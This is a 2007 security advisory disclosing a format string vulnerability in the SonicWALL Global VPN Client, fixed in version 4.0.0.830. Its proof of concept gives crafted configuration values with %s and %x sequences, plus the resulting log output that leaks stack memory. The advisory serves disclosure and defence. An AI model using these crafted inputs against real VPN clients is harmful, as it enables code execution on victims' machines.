SonicWALL Global VPN Client Format String Vulnerability

SEC Consult Security Advisory < 20071204-0 >

=====================================================================================

title: SonicWALL Global VPN Client Format String Vulnerability

program: SonicWALL Global VPN Client

vulnerable version: < 4.0.0.830

homepage: www.sonicwall.com

found: 06-12-2007

by: lofi42*

=====================================================================================

 

Vendor description:

---------------

 

The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.

 

 

Vulnerabilty overview:

---------------

 

SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability could allow an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file.

 

 

Vulnerability details:

---------------

 

Format string errors occur when the client parses the "name" attribute of the "Connection" tag and the content of the "Hostname" Tags in the configuration file.

 

Examples:

<Connection name=%s%s%s%s> 
<HostName>%s%s%s%s</HostName>

 

The bugs has been verified in version 3.1.556 and 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version beta 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log.

 

 

Proof-of-concept:

---------------

 

In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x 

 

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
----------------------</Connection name >-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------

 

 

vendor status:

---------------

vendor notified: 2007-08-16

vendor response: 2007-08-29

patch available: 2007-11-26

 

The issue has been fixed in SonicWall VPN client 4.0.0.830.